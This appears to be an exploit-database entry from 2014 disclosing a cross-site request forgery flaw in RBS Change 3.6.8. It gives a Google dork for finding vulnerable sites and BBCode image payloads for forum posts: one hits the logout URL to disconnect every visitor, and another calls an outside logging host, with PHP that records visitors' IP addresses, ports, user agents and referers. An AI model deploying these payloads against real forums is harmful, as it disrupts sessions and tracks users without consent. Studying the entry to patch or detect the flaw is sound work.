RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability

2014-10-02T00:00:00
ID 1337DAY-ID-22724
Type zdt
Reporter Krusty Hack
Modified 2014-10-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
 
HOW TO
======
 
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
 
TEST
====
 
Based on demo.rbschange.fr:
---------------------------
 
[img="http://server/fr/deconnexion/"][/img]
 
Will disconnect all users who load the image.
 
Other example:
--------------
 
[img="http://www.example.com/log.php"][/img]
 
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
 
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip -  $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
 
?>
 
To get users ip, user agent, ...

#  0day.today [2018-01-08]  #